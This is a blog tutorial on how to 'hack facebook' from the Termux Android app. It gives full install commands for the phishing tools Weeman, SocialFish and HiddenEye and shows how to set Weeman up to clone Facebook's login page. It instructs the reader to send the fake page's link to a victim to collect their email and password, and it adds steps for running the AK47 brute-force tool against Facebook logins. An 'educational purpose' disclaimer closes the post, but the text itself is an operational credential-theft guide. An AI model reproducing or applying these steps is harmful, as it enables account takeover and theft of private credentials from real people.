Hey guys, we are back with a simple tutorial to hack facebook with Termux by using Weeman Tool
after getting a lot of requests from our users, we decided to post this article about how to hack fb with termux
We have already posted an article about how to use Termux and Installation of some Hacking Tools, if you have missed that article then
You Can Read It here: Hacking with Termux App
Okay, now let me tell you what is Weeman, and how to install and use it on Termux Android app, finally use it your own risk and hack facebook,
Installing Weeman In Termux and Hacking Facebook
What you will learn in this post
- What is Weeman
- Installing Weeman In Termux
- Installing SocialFish In Termux
- Installing AK47 in Termux
- Installing Python 2 in Termux
- Finally hack Facebook with Termux
What is Weeman
Weeman is a simple but effective python tool for phishing, with this tool you can easily do phishing on any website, you can do phishing on Facebook to hack facebook accounts,
let me tell you how to use weeman in termux
This tool can be used to do phishing on various websites like Gmail, Twitter etc,
Okay cool, now let's go to the tutorial point
Firstly download and install Termux app on your Android
Then open Termux and type these commands and hit enter
apt update && upgrade
Now give permission to Termux to access your memory
So type below command
termux-setup-storage
Then type this command to install python2
pkg install python2
During installation of python2 you will be asked " Termux will use some space"
Just type Y and hit enter
Now you have to install git, for that type this command
pkg install git
After successfully installing git, type below command to install Weeman
git clone https://github.com/evait-security/weeman.git
After that type this command
cd weeman && ls
Now you have to type below command to run Weeman on Python
python2 weeman.py
Now you will see the Weeman user interface, its time to set all the necessary command
firstly you have to find your IP address, it is important so that you can find your IP address through termux
Just open a new tab on termux and type below command to see your IP
ifconfig
set url http://facebook.com
set action_url https://facebook.com
set port 8080
Note that, in this tutorial, we are going to do phishing for Facebook, inorder to hack facebook using Termux, so we have typed set url to Facebook.com.
How To Hack Facebook Using Termux (Weeman)
If you're targeting Facebook mobile users then set the url to m.facebook.com
Eg: set url http://m.facebook.com
Now finally type this command
run
Now you have to share your IP with your victim to get his username and password
so send a link to your victim as http://Your_IP:8080
Eg: http://127.0.0.1:8080
When your victim opens the link then it will open a phishing page and when they enter their email and password then you will easily get them as shown in the screenshot
How To Install SocialFish in Termux to Hack Facebook
SocialFish is Collection of Advanced Phishing Tools, we can use SocialFish in Termux to Hack Facebook, so let's see how we can install it on Termux
Firstly install Termux
Type below commands
apt update && apt upgrade
Then type
git clone https://github.com/UndeadSec/SocialFish.git
Then type
cd SocialFish
Then type
pip install -r requirements.txt
Now type
ls
chmod +x SocialFish.py
Finally Type
./SocialFish.py
Just use your brain to know how to use it
You can install SocialFish Tool developed by Anon U4DY in Termux By Using Only One Command
Just copy and paste below command in Termux
pkg install git python php curl openssh grep && pip3 install wget && git clone https://github.com/DarkSecDevelopers/HiddenEye && cd HiddenEye && chmod 777 HiddenEye.py && python HiddenEye.py
Install AK47 Facebook Brute Forcing Tool in Termux
Firstly let me say that Bruteforcing Facebook is a shit Nowadays, Facebook and many other sites are updating their Own AI to Detect Britefore Attack and Block The Requests, still if you're interested then try this tool
Type Below Commands To install
pkg install python2
Then
pkg install git
Then type
git clone https://github.com/nasirxo/AK47
Now type ls
Then type
cd AK47
Then type
chmod +x *
Now type ls
Then type
python2 ak47.py
And select Facebook brute and follow the instruction
Conclusion :
Hope you guys learnt how to hack facebook account with termux,
This tutorial is only for educational purpose, we are not responsible for any misuse
If you found our tutorial is cool then do subscribe to our free newsletter, and get these tutorials directly in your inbox
0 comments:
Post a Comment